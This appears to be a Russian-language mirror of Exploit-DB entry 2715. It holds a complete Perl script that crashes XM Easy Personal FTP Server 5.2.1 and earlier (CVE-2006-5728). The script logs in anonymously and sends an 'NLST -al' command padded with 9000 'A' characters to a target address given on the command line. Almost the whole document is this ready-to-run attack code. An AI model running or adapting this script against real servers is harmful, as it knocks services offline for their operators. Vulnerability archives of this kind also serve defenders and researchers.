- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2715
- Проверка EDB
-
- Пройдено
- Автор
- BOECKE
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2006-5728
- Дата публикации
- 2006-11-04
Код:
#!/usr/bin/perl
#
# *
# * Title: XM Easy Personal FTP Server <= 5.2.1 'NLST -al' Remote Denial of Service
# * Author: boecke
# * Discovery: boecke
# * Vulnerability Type: Remote Denial of Service
# * Risk: Low Risk (Requires valid
# * Software Affected: XM Easy Personal FTP Server <= 5.2.1
# * Greetings: henrik, str0ke!
# *
#
use IO::Socket;
$commandToSend = "NLST -al ";
$remoteUsername = "anonymous";
$remotePassword = "borat\@kik.com";
$remotePort = $ARGV[1];
sub bannerExploit()
{
print "\n x XM Easy Personal FTP Server <= v5.2.1 Remote Denial of Service\n";
print " x Author: boecke\n x Discovery: boecke (boecke [at] herzeleid [dot] net)\n\n";
}
if ( @ARGV < 2 )
{
bannerExploit();
print " * Usage: perl ftp.pl 192.168.0.1 21\n\n";
exit;
}
if ($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $remotePort, Proto => "TCP" ))
{
bannerExploit();
print " + Establishing connection at " . $ARGV[0] . ":" . $remotePort . "\n";
print $socket "USER " . $remoteUsername . "\r\n";
print " * FTP Username: \'" . $remoteUsername . "\'\n";
sleep( 1 );
print $socket "PASS " . $remotePassword . "\r\n";
print " * FTP Password: \'" . $remotePassword . "\'\n";
print $socket $commandToSend . "A" x 9000 . "\r\n";
sleep( 3 );
print $socket "QUIT\r\n";
print " + Sent 9000 bytes of data to $ARGV[0]:$remotePort\n\n";
}
else
{
bannerExploit();
print " + Failed to establish connection to " . $ARGV[0] . ":" . $remotePort . "\n";
}
# milw0rm.com [2006-11-04]
- Источник
- www.exploit-db.com